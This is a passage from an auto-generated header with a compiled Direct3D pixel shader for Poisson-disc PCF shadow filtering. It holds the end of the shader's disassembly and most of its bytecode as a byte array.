mad r2.z, r3.z, l(0.363963), r2.z
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.390925), r2.z
mad r5.xyzw, r3.xyxy, l(1.848549, -4.045560, 4.485181, -1.039879), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.xyxx, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.577211), r2.z
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.554971), r2.z
mad r5.xyzw, r3.xyxy, l(-0.072291, -3.524127, 1.539461, -6.215834), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.xyxx, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.708128), r2.z
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.320116), r2.z
mad r5.xyzw, r3.xyxy, l(-0.425475, -6.440681, 4.227208, -4.779742), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.xyxx, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.314328), r2.z
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.322717), r2.z
mad r5.xyzw, r3.xyxy, l(6.360718, -0.269859, 3.497874, -3.338060), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.xyxx, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.324368), r2.z
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.522368), r2.z
mad r5.xyzw, r3.xyxy, l(-4.590532, 3.906749, 2.116800, 1.092689), r4.xyxy
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.xyxx, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.364465), r2.z
sample_c_lz_indexable(texture2d)(float,float,float,float) r3.z, r5.zwzz, t2.xxxx, s3, r2.w
mad r2.z, r3.z, l(0.854163), r2.z
mad r3.xy, r3.xyxx, l(6.069216, 1.384925, 0.000000, 0.000000), r4.xyxx
sample_c_lz_indexable(texture2d)(float,float,float,float) r2.w, r3.xyxx, t2.xxxx, s3, r2.w
mad r2.z, r2.w, l(0.340792), r2.z
mul r2.z, r2.z, l(0.044188)
mov r0.w, l(0)
else
mov r2.z, l(1.000000)
endif
min r2.y, r2.z, r2.y
iadd r2.x, r2.x, l(1)
endloop
mov o0.xyzw, r2.yyyy
ret
// Approximately 159 instruction slots used
#endif
const BYTE PS_SF_T2D_CASCADE_UNIFORM_TEX_FETCH_PCF_TAP_TYPE_POISSON_NORMAL_OPTION_NONE_FILTER_SIZE_13_Data[] =
{
68, 88, 66, 67, 177, 90,
5, 149, 10, 64, 250, 34,
15, 30, 153, 75, 190, 194,
112, 249, 1, 0, 0, 0,
180, 31, 0, 0, 5, 0,
0, 0, 52, 0, 0, 0,
236, 5, 0, 0, 68, 6,
0, 0, 120, 6, 0, 0,
24, 31, 0, 0, 82, 68,
69, 70, 176, 5, 0, 0,
1, 0, 0, 0, 240, 0,
0, 0, 4, 0, 0, 0,
60, 0, 0, 0, 0, 5,
255, 255, 0, 1, 0, 0,
124, 5, 0, 0, 82, 68,
49, 49, 60, 0, 0, 0,
24, 0, 0, 0, 32, 0,
0, 0, 40, 0, 0, 0,
36, 0, 0, 0, 12, 0,
0, 0, 0, 0, 0, 0,
188, 0, 0, 0, 3, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 3, 0, 0, 0,
1, 0, 0, 0, 3, 0,
0, 0, 200, 0, 0, 0,
2, 0, 0, 0, 5, 0,
0, 0, 4, 0, 0, 0,
255, 255, 255, 255, 0, 0,
0, 0, 1, 0, 0, 0,
1, 0, 0, 0, 211, 0,
0, 0, 2, 0, 0, 0,
5, 0, 0, 0, 4, 0,
0, 0, 255, 255, 255, 255,
2, 0, 0, 0, 1, 0,
0, 0, 1, 0, 0, 0,
223, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
1, 0, 0, 0, 1, 0,
0, 0, 103, 95, 115, 99,
115, 76, 105, 110, 101, 97,
114, 0, 103, 95, 116, 50,
100, 68, 101, 112, 116, 104,
0, 103, 95, 116, 50, 100,
83, 104, 97, 100, 111, 119,
0, 67, 66, 95, 83, 72,
65, 68, 79, 87, 83, 95,
68, 65, 84, 65, 0, 171,
223, 0, 0, 0, 1, 0,
0, 0, 8, 1, 0, 0,
80, 14, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
48, 1, 0, 0, 0, 0,
0, 0, 80, 14, 0, 0,
2, 0, 0, 0, 88, 5,
0, 0, 0, 0, 0, 0,
255, 255, 255, 255, 0, 0,
0, 0, 255, 255, 255, 255,
0, 0, 0, 0, 103, 95,
99, 98, 83, 104, 97, 100,
111, 119, 115, 68, 97, 116,
97, 0, 83, 104, 97, 100,
111, 119, 115, 68, 97, 116,
97, 0, 109, 95, 86, 105,
101, 119, 101, 114, 0, 67,
97, 109, 101, 114, 97, 0,
109, 95, 86, 105, 101, 119,
0, 102, 108, 111, 97, 116,
52, 120, 52, 0, 3, 0,
3, 0, 4, 0, 4, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
99, 1, 0, 0, 109, 95,
80, 114, 111, 106, 101, 99,
116, 105, 111, 110, 0, 109,
95, 86, 105, 101, 119, 80,
114, 111, 106, 101, 99, 116,
105, 111, 110, 0, 109, 95,
86, 105, 101, 119, 95, 73,
110, 118, 0, 109, 95, 80,
114, 111, 106, 101, 99, 116,
105, 111, 110, 95, 73, 110,
118, 0, 109, 95, 86, 105,
101, 119, 80, 114, 111, 106,
101, 99, 116, 105, 111, 110,
95, 73, 110, 118, 0, 109,
95, 80, 111, 115, 105, 116,
105, 111, 110, 0, 102, 108,
111, 97, 116, 51, 0, 171,
171, 171, 1, 0, 3, 0,
1, 0, 3, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 234, 1,
0, 0, 109, 95, 70, 111,
118, 0, 102, 108, 111, 97,
116, 0, 0, 0, 3, 0,
1, 0, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 30, 2,
0, 0, 109, 95, 68, 105,
114, 101, 99, 116, 105, 111,
110, 0, 109, 95, 70, 97,
114, 80, 108, 97, 110, 101,
0, 109, 95, 82, 105, 103,
104, 116, 0, 109, 95, 78,
101, 97, 114, 80, 108, 97,
110, 101, 0, 109, 95, 85,
112, 0, 109, 95, 65, 115,
112, 101, 99, 116, 0, 109,
95, 67, 111, 108, 111, 114,
0, 102, 108, 111, 97, 116,
52, 0, 1, 0, 3, 0,
1, 0, 4, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 137, 2,
0, 0, 92, 1, 0, 0,
108, 1, 0, 0, 0, 0,
0, 0, 144, 1, 0, 0,
108, 1, 0, 0, 64, 0,
0, 0, 157, 1, 0, 0,
108, 1, 0, 0, 128, 0,
0, 0, 174, 1, 0, 0,
108, 1, 0, 0, 192, 0,
0, 0, 185, 1, 0, 0,
108, 1, 0, 0, 0, 1,
0, 0, 202, 1, 0, 0,
108, 1, 0, 0, 64, 1,
0, 0, 223, 1, 0, 0,
244, 1, 0, 0, 128, 1,
0, 0, 24, 2, 0, 0,
36, 2, 0, 0, 140, 1,
0, 0, 72, 2, 0, 0,
244, 1, 0, 0, 144, 1,
0, 0, 84, 2, 0, 0,
36, 2, 0, 0, 156, 1,
0, 0, 95, 2, 0, 0,
244, 1, 0, 0, 160, 1,
0, 0, 103, 2, 0, 0,
36, 2, 0, 0, 172, 1,
0, 0, 115, 2, 0, 0,
244, 1, 0, 0, 176, 1,
0, 0, 120, 2, 0, 0,
36, 2, 0, 0, 188, 1,
0, 0, 129, 2, 0, 0,
144, 2, 0, 0, 192, 1,
0, 0, 5, 0, 0, 0,
1, 0, 116, 0, 0, 0,
15, 0, 180, 2, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 85, 1,
0, 0, 109, 95, 83, 105,
122, 101, 0, 102, 108, 111,
97, 116, 50, 0, 171, 171,
1, 0, 3, 0, 1, 0,
2, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 147, 3, 0, 0,
109, 95, 83, 105, 122, 101,
73, 110, 118, 0, 109, 95,
76, 105, 103, 104, 116, 0,
83, 104, 97, 100, 111, 119,
115, 76, 105, 103, 104, 116,
68, 97, 116, 97, 0, 109,
95, 67, 97, 109, 101, 114,
97, 0, 109, 95, 82, 101,
103, 105, 111, 110, 0, 109,
95, 87, 101, 105, 103, 104,
116, 0, 109, 95, 83, 117,
110, 65, 114, 101, 97, 0,
109, 95, 68, 101, 112, 116,
104, 84, 101, 115, 116, 79,
102, 102, 115, 101, 116, 0,
109, 95, 78, 111, 114, 109,
97, 108, 79, 102, 102, 115,
101, 116, 83, 99, 97, 108,
101, 0, 109, 95, 65, 114,
114, 97, 121, 83, 108, 105,
99, 101, 0, 100, 119, 111,
114, 100, 0, 171, 171, 171,
0, 0, 19, 0, 1, 0,
1, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 59, 4, 0, 0,
227, 3, 0, 0, 104, 3,
0, 0, 0, 0, 0, 0,
140, 3, 0, 0, 156, 3,
0, 0, 208, 1, 0, 0,
192, 3, 0, 0, 156, 3,
0, 0, 216, 1, 0, 0,
236, 3, 0, 0, 144, 2,
0, 0, 224, 1, 0, 0,
245, 3, 0, 0, 144, 2,
0, 0, 240, 1, 0, 0,
254, 3, 0, 0, 36, 2,
0, 0, 0, 2, 0, 0,
8, 4, 0, 0, 36, 2,
0, 0, 4, 2, 0, 0,
26, 4, 0, 0, 36, 2,
0, 0, 8, 2, 0, 0,
46, 4, 0, 0, 68, 4,
0, 0, 12, 2, 0, 0,
5, 0, 0, 0, 1, 0,
132, 0, 6, 0, 9, 0,
104, 4, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 210, 3, 0, 0,
109, 95, 65, 99, 116, 105,
118, 101, 76, 105, 103, 104,
116, 67, 111, 117, 110, 116,
0, 112, 97, 100, 51, 0,
76, 1, 0, 0, 104, 3,
0, 0, 0, 0, 0, 0,
140, 3, 0, 0, 156, 3,
0, 0, 208, 1, 0, 0,
192, 3, 0, 0, 156, 3,
0, 0, 216, 1, 0, 0,
202, 3, 0, 0, 212, 4,
0, 0, 224, 1, 0, 0,
248, 4, 0, 0, 68, 4,
0, 0, 64, 14, 0, 0,
11, 5, 0, 0, 244, 1,
0, 0, 68, 14, 0, 0,
5, 0, 0, 0, 1, 0,
148, 3, 0, 0, 6, 0,
16, 5, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 64, 1, 0, 0,
77, 105, 99, 114, 111, 115,
111, 102, 116, 32, 40, 82,
41, 32, 72, 76, 83, 76,
32, 83, 104, 97, 100, 101,
114, 32, 67, 111, 109, 112,
105, 108, 101, 114, 32, 49,
48, 46, 48, 46, 49, 48,
48, 49, 49, 46, 49, 54,
51, 56, 52, 0, 73, 83,
71, 78, 80, 0, 0, 0,
2, 0, 0, 0, 8, 0,
0, 0, 56, 0, 0, 0,
0, 0, 0, 0, 1, 0,
0, 0, 3, 0, 0, 0,
0, 0, 0, 0, 15, 3,
0, 0, 68, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 3, 0, 0, 0,
1, 0, 0, 0, 3, 0,
0, 0, 83, 86, 95, 80,
79, 83, 73, 84, 73, 79,
78, 0, 84, 69, 88, 67,
79, 79, 82, 68, 0, 171,
171, 171, 79, 83, 71, 78,
44, 0, 0, 0, 1, 0,
0, 0, 8, 0, 0, 0,
32, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
3, 0, 0, 0, 0, 0,
0, 0, 15, 0, 0, 0,
83, 86, 95, 84, 97, 114,
103, 101, 116, 0, 171, 171,
83, 72, 69, 88, 152, 24,
0, 0, 80, 0, 0, 0,
38, 6, 0, 0, 106, 8,
0, 1, 89, 8, 0, 4,
70, 142, 32, 0, 0, 0,
0, 0, 229, 0, 0, 0,
90, 8, 0, 3, 0, 96,
16, 0, 3, 0, 0, 0,
88, 24, 0, 4, 0, 112,
16, 0, 0, 0, 0, 0,
85, 85, 0, 0, 88, 24,
0, 4, 0, 112, 16, 0,
2, 0, 0, 0, 85, 85,
0, 0, 100, 32, 0, 4,
50, 16, 16, 0, 0, 0,
0, 0, 1, 0, 0, 0,
101, 0, 0, 3, 242, 32,
16, 0, 0, 0, 0, 0,
104, 0, 0, 2, 6, 0,
0, 0, 56, 0, 0, 8,
18, 0, 16, 0, 0, 0,
0, 0, 10, 16, 16, 0,
0, 0, 0, 0, 42, 128,
32, 0, 0, 0, 0, 0,
29, 0, 0, 0, 56, 0,
0, 9, 34, 0, 16, 0,
0, 0, 0, 0, 26, 16,
16, 0, 0, 0, 0, 0,
58, 128, 32, 128, 65, 0,
0, 0, 0, 0, 0, 0,
29, 0, 0, 0, 0, 0,
0, 10, 50, 0, 16, 0,
0, 0, 0, 0, 70, 0,
16, 0, 0, 0, 0, 0,
2, 64, 0, 0, 0, 0,
0, 191, 0, 0, 0, 63,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 7,
50, 0, 16, 0, 0, 0,
0, 0, 70, 0, 16, 0,
0, 0, 0, 0, 70, 0,
16, 0, 0, 0, 0, 0,
27, 0, 0, 5, 50, 0,
16, 0, 1, 0, 0, 0,
70, 16, 16, 0, 0, 0,
0, 0, 54, 0, 0, 8,
194, 0, 16, 0, 1, 0,
0, 0, 2, 64, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 45, 0,
0, 137, 194, 0, 0, 128,
67, 85, 21, 0, 66, 0,
16, 0, 0, 0, 0, 0,
70, 14, 16, 0, 1, 0,
0, 0, 150, 124, 16, 0,
0, 0, 0, 0, 54, 0,
0, 5, 130, 0, 16, 0,
0, 0, 0, 0, 1, 64,
0, 0, 0, 0, 128, 63,
17, 0, 0, 8, 18, 0,
16, 0, 1, 0, 0, 0,
70, 14, 16, 0, 0, 0,
0, 0, 70, 142, 32, 0,
0, 0, 0, 0, 20, 0,
0, 0, 17, 0, 0, 8,
34, 0, 16, 0, 1, 0,
0, 0, 70, 14, 16, 0,
0, 0, 0, 0, 70, 142,
32, 0, 0, 0, 0, 0,
21, 0, 0, 0, 17, 0,
0, 8, 66, 0, 16, 0,
1, 0, 0, 0, 70, 14,
16, 0, 0, 0, 0, 0,
70, 142, 32, 0, 0, 0,
0, 0, 22, 0, 0, 0,
17, 0, 0, 8, 130, 0,
16, 0, 1, 0, 0, 0,
70, 14, 16, 0, 0, 0,
0, 0, 70, 142, 32, 0,
0, 0, 0, 0, 23, 0,
0, 0, 14, 0, 0, 7,
242, 0, 16, 0, 0, 0,
0, 0, 70, 14, 16, 0,
1, 0, 0, 0, 246, 15,
16, 0, 1, 0, 0, 0,
54, 0, 0, 5, 130, 0,
16, 0, 1, 0, 0, 0,
58, 0, 16, 0, 0, 0,
0, 0, 54, 0, 0, 5,
114, 0, 16, 0, 1, 0,
0, 0, 70, 2, 16, 0,
0, 0, 0, 0, 54, 0,
0, 5, 130, 0, 16, 0,
0, 0, 0, 0, 1, 64,
0, 0, 255, 255, 255, 255,
54, 0, 0, 8, 50, 0,
16, 0, 2, 0, 0, 0,
2, 64, 0, 0, 0, 0,
0, 0, 0, 0, 128, 63,
0, 0, 0, 0, 0, 0,
0, 0, 48, 0, 0, 1,
79, 0, 0, 8, 66, 0,
16, 0, 2, 0, 0, 0,
10, 0, 16, 0, 2, 0,
0, 0, 10, 128, 32, 0,
0, 0, 0, 0, 228, 0,
0, 0, 1, 0, 0, 7,
66, 0, 16, 0, 2, 0,
0, 0, 58, 0, 16, 0,
0, 0, 0, 0, 42, 0,
16, 0, 2, 0, 0, 0,
3, 0, 0, 3, 42, 0,
16, 0, 2, 0, 0, 0,
38, 0, 0, 8, 0, 208,
0, 0, 66, 0, 16, 0,
2, 0, 0, 0, 10, 0,
16, 0, 2, 0, 0, 0,
1, 64, 0, 0, 33, 0,
0, 0, 17, 0, 0, 10,
18, 0, 16, 0, 3, 0,
0, 0, 70, 14, 16, 0,
1, 0, 0, 0, 70, 142,
32, 6, 0, 0, 0, 0,
38, 0, 0, 0, 42, 0,
16, 0, 2, 0, 0, 0,
17, 0, 0, 10, 34, 0,
16, 0, 3, 0, 0, 0,
70, 14, 16, 0, 1, 0,
0, 0, 70, 142, 32, 6,
0, 0, 0, 0, 39, 0,
0, 0, 42, 0, 16, 0,
2, 0, 0, 0, 17, 0,
0, 10, 66, 0, 16, 0,
3, 0, 0, 0, 70, 14,
16, 0, 1, 0, 0, 0,
70, 142, 32, 6, 0, 0,
0, 0, 40, 0, 0, 0,
42, 0, 16, 0, 2, 0,
0, 0, 17, 0, 0, 10,
130, 0, 16, 0, 2, 0,
0, 0, 70, 14, 16, 0,
1, 0, 0, 0, 70, 142,
32, 6, 0, 0, 0, 0,
41, 0, 0, 0, 42, 0,
16, 0, 2, 0, 0, 0,
14, 0, 0, 7, 114, 0,
16, 0, 3, 0, 0, 0,
70, 2, 16, 0, 3, 0,
0, 0, 246, 15, 16, 0,
2, 0, 0, 0, 50, 0,
0, 15, 50, 0, 16, 0,
4, 0, 0, 0, 70, 0,
16, 0, 3, 0, 0, 0,
2, 64, 0, 0, 0, 0,
0, 63, 0, 0, 0, 63,
0, 0, 0, 0, 0, 0,
0, 0, 2, 64, 0, 0,
0, 0, 0, 63, 0, 0,
0, 63, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 8, 130, 0, 16, 0,
2, 0, 0, 0, 26, 0,
16, 128, 65, 0, 0, 0,
4, 0, 0, 0, 1, 64,
0, 0, 0, 0, 128, 63,
29, 0, 0, 7, 18, 0,
16, 0, 3, 0, 0, 0,
10, 0, 16, 0, 4, 0,
0, 0, 1, 64, 0, 0,
0, 0, 0, 0, 29, 0,
0, 7, 34, 0, 16, 0,
3, 0, 0, 0, 1, 64,
0, 0, 0, 0, 128, 63,
10, 0, 16, 0, 4, 0,
0, 0, 1, 0, 0, 7,
18, 0, 16, 0, 3, 0,
0, 0, 26, 0, 16, 0,
3, 0, 0, 0, 10, 0,
16, 0, 3, 0, 0, 0,
29, 0, 0, 7, 34, 0,
16, 0, 3, 0, 0, 0,
58, 0, 16, 0, 2, 0,
0, 0, 1, 64, 0, 0,
0, 0, 0, 0, 1, 0,
0, 7, 18, 0, 16, 0,
3, 0, 0, 0, 26, 0,
16, 0, 3, 0, 0, 0,
10, 0, 16, 0, 3, 0,
0, 0, 29, 0, 0, 7,
130, 0, 16, 0, 2, 0,
0, 0, 1, 64, 0, 0,
0, 0, 128, 63, 58, 0,
16, 0, 2, 0, 0, 0,
1, 0, 0, 7, 130, 0,
16, 0, 2, 0, 0, 0,
58, 0, 16, 0, 2, 0,
0, 0, 10, 0, 16, 0,
3, 0, 0, 0, 29, 0,
0, 7, 18, 0, 16, 0,
3, 0, 0, 0, 42, 0,
16, 0, 3, 0, 0, 0,
1, 64, 0, 0, 0, 0,
0, 0, 1, 0, 0, 7,
130, 0, 16, 0, 2, 0,
0, 0, 58, 0, 16, 0,
2, 0, 0, 0, 10, 0,
16, 0, 3, 0, 0, 0,
29, 0, 0, 7, 18, 0,
16, 0, 3, 0, 0, 0,
1, 64, 0, 0, 0, 0,
128, 63, 42, 0, 16, 0,
3, 0, 0, 0, 1, 0,
0, 7, 130, 0, 16, 0,
2, 0, 0, 0, 58, 0,
16, 0, 2, 0, 0, 0,
10, 0, 16, 0, 3, 0,
0, 0, 31, 0, 4, 3,
58, 0, 16, 0, 2, 0,
0, 0, 0, 0, 0, 14,
50, 0, 16, 0, 3, 0,
0, 0, 70, 128, 32, 134,
65, 0, 0, 0, 0, 0,
0, 0, 60, 0, 0, 0,
42, 0, 16, 0, 2, 0,
0, 0, 230, 138, 32, 6,
0, 0, 0, 0, 60, 0,
0, 0, 42, 0, 16, 0,
2, 0, 0, 0, 0, 0,
0, 8, 66, 0, 16, 0,
4, 0, 0, 0, 26, 0,
16, 128, 65, 0, 0, 0,
4, 0, 0, 0, 1, 64,
0, 0, 0, 0, 128, 63,
50, 0, 0, 12, 50, 0,
16, 0, 4, 0, 0, 0,
134, 0, 16, 0, 4, 0,
0, 0, 70, 0, 16, 0,
3, 0, 0, 0, 70, 128,
32, 6, 0, 0, 0, 0,
60, 0, 0, 0, 42, 0,
16, 0, 2, 0, 0, 0,
0, 0, 0, 11, 130, 0,
16, 0, 2, 0, 0, 0,
42, 0, 16, 0, 3, 0,
0, 0, 26, 128, 32, 134,
65, 0, 0, 0, 0, 0,
0, 0, 62, 0, 0, 0,
42, 0, 16, 0, 2, 0,
0, 0, 56, 0, 0, 10,
50, 0, 16, 0, 3, 0,
0, 0, 70, 0, 16, 0,
3, 0, 0, 0, 230, 138,
32, 6, 0, 0, 0, 0,
59, 0, 0, 0, 42, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 12, 242, 0,
16, 0, 5, 0, 0, 0,
70, 4, 16, 0, 3, 0,
0, 0, 2, 64, 0, 0,
9, 53, 203, 63, 76, 126,
153, 64, 114, 55, 223, 62,
193, 116, 82, 64, 70, 4,
16, 0, 4, 0, 0, 0,
71, 0, 0, 141, 194, 0,
0, 128, 67, 85, 21, 0,
66, 0, 16, 0, 2, 0,
0, 0, 70, 0, 16, 0,
5, 0, 0, 0, 6, 112,
16, 0, 2, 0, 0, 0,
0, 96, 16, 0, 3, 0,
0, 0, 58, 0, 16, 0,
2, 0, 0, 0, 71, 0,
0, 141, 194, 0, 0, 128,
67, 85, 21, 0, 66, 0,
16, 0, 3, 0, 0, 0,
230, 10, 16, 0, 5, 0,
0, 0, 6, 112, 16, 0,
2, 0, 0, 0, 0, 96,
16, 0, 3, 0, 0, 0,
58, 0, 16, 0, 2, 0,
0, 0, 56, 0, 0, 7,
66, 0, 16, 0, 3, 0,
0, 0, 42, 0, 16, 0,
3, 0, 0, 0, 1, 64,
0, 0, 156, 148, 60, 63,
50, 0, 0, 9, 66, 0,
16, 0, 2, 0, 0, 0,
42, 0, 16, 0, 2, 0,
0, 0, 1, 64, 0, 0,
120, 241, 251, 62, 42, 0,
16, 0, 3, 0, 0, 0,
50, 0, 0, 12, 242, 0,
16, 0, 5, 0, 0, 0,
70, 4, 16, 0, 3, 0,
0, 0, 2, 64, 0, 0,
116, 72, 93, 191, 85, 109,
146, 64, 82, 182, 82, 64,
41, 109, 164, 64, 70, 4,
16, 0, 4, 0, 0, 0,
71, 0, 0, 141, 194, 0,
0, 128, 67, 85, 21, 0,
66, 0, 16, 0, 3, 0,
0, 0, 70, 0, 16, 0,
5, 0, 0, 0, 6, 112,
16, 0, 2, 0, 0, 0,
0, 96, 16, 0, 3, 0,
0, 0, 58, 0, 16, 0,
2, 0, 0, 0, 50, 0,
0, 9, 66, 0, 16, 0,
2, 0, 0, 0, 42, 0,
16, 0, 3, 0, 0, 0,
1, 64, 0, 0, 146, 41,
12, 63, 42, 0, 16, 0,
2, 0, 0, 0, 71, 0,
0, 141, 194, 0, 0, 128,
67, 85, 21, 0, 66, 0,
16, 0, 3, 0, 0, 0,
230, 10, 16, 0, 5, 0,
0, 0, 6, 112, 16, 0,
2, 0, 0, 0, 0, 96,
16, 0, 3, 0, 0, 0,
58, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 9,
66, 0, 16, 0, 2, 0,
0, 0, 42, 0, 16, 0,
3, 0, 0, 0, 1, 64,
0, 0, 87, 247, 181, 62,
42, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 12,
242, 0, 16, 0, 5, 0,
0, 0, 70, 4, 16, 0,
3, 0, 0, 0, 2, 64,
0, 0, 101, 0, 20, 64,
230, 59, 49, 64, 3, 54,
135, 64, 12, 177, 102, 64,
70, 4, 16, 0, 4, 0,
0, 0, 71, 0, 0, 141,
194, 0, 0, 128, 67, 85,
21, 0, 66, 0, 16, 0,
3, 0, 0, 0, 70, 0,
16, 0, 5, 0, 0, 0,
6, 112, 16, 0, 2, 0,
0, 0, 0, 96, 16, 0,
3, 0, 0, 0, 58, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 9, 66, 0,
16, 0, 2, 0, 0, 0,
42, 0, 16, 0, 3, 0,
0, 0, 1, 64, 0, 0,
250, 82, 50, 63, 42, 0,
16, 0, 2, 0, 0, 0,
71, 0, 0, 141, 194, 0,
0, 128, 67, 85, 21, 0,
66, 0, 16, 0, 3, 0,
0, 0, 230, 10, 16, 0,
5, 0, 0, 0, 6, 112,
16, 0, 2, 0, 0, 0,
0, 96, 16, 0, 3, 0,
0, 0, 58, 0, 16, 0,
2, 0, 0, 0, 50, 0,
0, 9, 66, 0, 16, 0,
2, 0, 0, 0, 42, 0,
16, 0, 3, 0, 0, 0,
1, 64, 0, 0, 19, 88,
217, 62, 42, 0, 16, 0,
2, 0, 0, 0, 50, 0,
0, 12, 242, 0, 16, 0,
5, 0, 0, 0, 70, 4,
16, 0, 3, 0, 0, 0,
2, 64, 0, 0, 180, 193,
0, 63, 36, 227, 192, 64,
58, 215, 12, 63, 224, 243,
169, 63, 70, 4, 16, 0,
4, 0, 0, 0, 71, 0,
0, 141, 194, 0, 0, 128,
67, 85, 21, 0, 66, 0,
16, 0, 3, 0, 0, 0,
70, 0, 16, 0, 5, 0,
0, 0, 6, 112, 16, 0,
2, 0, 0, 0, 0, 96,
16, 0, 3, 0, 0, 0,
58, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 9,
66, 0, 16, 0, 2, 0,
0, 0, 42, 0, 16, 0,
3, 0, 0, 0, 1, 64,
0, 0, 140, 79, 185, 62,
42, 0, 16, 0, 2, 0,
0, 0, 71, 0, 0, 141,
194, 0, 0, 128, 67, 85,
21, 0, 66, 0, 16, 0,
3, 0, 0, 0, 230, 10,
16, 0, 5, 0, 0, 0,
6, 112, 16, 0, 2, 0,
0, 0, 0, 96, 16, 0,
3, 0, 0, 0, 58, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 9, 66, 0,
16, 0, 2, 0, 0, 0,
42, 0, 16, 0, 3, 0,
0, 0, 1, 64, 0, 0,
133, 185, 113, 63, 42, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 12, 242, 0,
16, 0, 5, 0, 0, 0,
70, 4, 16, 0, 3, 0,
0, 0, 2, 64, 0, 0,
16, 93, 112, 64, 49, 146,
222, 62, 219, 205, 140, 64,
108, 236, 252, 63, 70, 4,
16, 0, 4, 0, 0, 0,
71, 0, 0, 141, 194, 0,
0, 128, 67, 85, 21, 0,
66, 0, 16, 0, 3, 0,
0, 0, 70, 0, 16, 0,
5, 0, 0, 0, 6, 112,
16, 0, 2, 0, 0, 0,
0, 96, 16, 0, 3, 0,
0, 0, 58, 0, 16, 0,
2, 0, 0, 0, 50, 0,
0, 9, 66, 0, 16, 0,
2, 0, 0, 0, 42, 0,
16, 0, 3, 0, 0, 0,
1, 64, 0, 0, 129, 27,
44, 63, 42, 0, 16, 0,
2, 0, 0, 0, 71, 0,
0, 141, 194, 0, 0, 128,
67, 85, 21, 0, 66, 0,
16, 0, 3, 0, 0, 0,
230, 10, 16, 0, 5, 0,
0, 0, 6, 112, 16, 0,
2, 0, 0, 0, 0, 96,
16, 0, 3, 0, 0, 0,
58, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 9,
66, 0, 16, 0, 2, 0,
0, 0, 42, 0, 16, 0,
3, 0, 0, 0, 1, 64,
0, 0, 201, 36, 6, 63,
42, 0, 16, 0, 2, 0,
0, 0, 50, 0, 0, 12,
242, 0, 16, 0, 5, 0,
0, 0, 70, 4, 16, 0,
3, 0, 0, 0, 2, 64,
0, 0, 141, 42, 183, 64,
83, 9, 67, 64, 0, 27,
63, 192, 94, 14, 101, 64,
70, 4, 16, 0, 4, 0,
0, 0, 71, 0, 0, 141,
194, 0, 0, 128, 67, 85,
21, 0, 66, 0, 16, 0,
3, 0, 0, 0, 70, 0,
16, 0, 5, 0, 0, 0,
6, 112, 16, 0, 2, 0,
0, 0, 0, 96, 16, 0,
3, 0, 0, 0, 58, 0,
16, 0, 2, 0, 0, 0,
50, 0, 0, 9, 66, 0,
16, 0, 2, 0, 0, 0,
42, 0, 16, 0, 3, 0,
0, 0, 1, 64, 0, 0,
21, 55, 159, 62, 42, 0,
16, 0, 2, 0, 0, 0,
71, 0, 0, 141, 194, 0,
0, 128, 67, 85, 21, 0,
66, 0, 16, 0, 3, 0,
0, 0, 230, 10, 16, 0,
5, 0, 0, 0, 6, 112,
16, 0, 2, 0, 0, 0,
0, 96, 16, 0, 3, 0,
0, 0, 58, 0, 16, 0,
2, 0, 0, 0, 50, 0,
0, 9, 66, 0, 16, 0,
